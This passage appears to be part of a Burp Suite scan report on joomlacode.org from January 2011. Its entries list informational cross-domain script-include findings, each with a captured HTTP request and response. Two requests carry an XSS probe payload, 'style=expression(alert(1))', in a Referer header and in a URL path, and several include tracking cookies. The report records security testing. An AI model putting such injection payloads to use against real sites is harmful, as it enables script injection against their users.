<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.254. http://joomlacode.org/gf/project/docman/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/docman/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/docman/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:54:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18332


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.255. http://joomlacode.org/gf/project/feedgator/frs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/feedgator/frs/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/feedgator/frs/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:34:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25006


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.256. http://joomlacode.org/gf/project/feedgator/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/feedgator/news/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/feedgator/news/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:33:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33813


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.257. http://joomlacode.org/gf/project/imgttfmenu/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/imgttfmenu/news/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/imgttfmenu/news/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:27:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25041


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.258. http://joomlacode.org/gf/project/jevents/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/jevents/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/jevents/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:52:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.259. http://joomlacode.org/gf/project/joomfish/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomfish/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomfish/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:54:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19066


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.260. http://joomlacode.org/gf/project/joomla/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.261. http://joomlacode.org/gf/project/joomla/frs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/frs/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/frs/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.262. http://joomlacode.org/gf/project/joomla/mailman/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/mailman/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/mailman/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:23:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18427


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.263. http://joomlacode.org/gf/project/joomla/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/news/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/news/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:23:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15505


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.264. http://joomlacode.org/gf/project/joomla/reporting/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/reporting/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/reporting/ HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/project/joomla/tracker/?3ee00%22style%3d%22x%3aexpression(alert(1))%22744e3c5545f=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.1.10.1295919318

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.265. http://joomlacode.org/gf/project/joomla/scmsvn/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/scmsvn/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/scmsvn/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.266. http://joomlacode.org/gf/project/joomla/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/search/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/search/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:22:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11845


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.267. http://joomlacode.org/gf/project/joomla/tracker/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/tracker/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/tracker/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.268. http://joomlacode.org/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:15:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.269. http://joomlacode.org/gf/project/joomlaxplorer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomlaxplorer/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomlaxplorer/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:56:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17413


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.270. http://joomlacode.org/gf/project/jpack/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/jpack/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/jpack/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:53:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15905


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.271. http://joomlacode.org/gf/project/jpub/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/jpub/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/jpub/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:47:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.272. http://joomlacode.org/gf/project/jtranslation/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/jtranslation/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/jtranslation/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.273. http://joomlacode.org/gf/project/kunena/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/kunena/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/kunena/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:55:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18148


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.274. http://joomlacode.org/gf/project/mambot_google1/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/mambot_google1/news/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/mambot_google1/news/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:42:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26241


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.275. http://joomlacode.org/gf/project/opengallery/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/opengallery/

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/opengallery/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:40:22 GMT
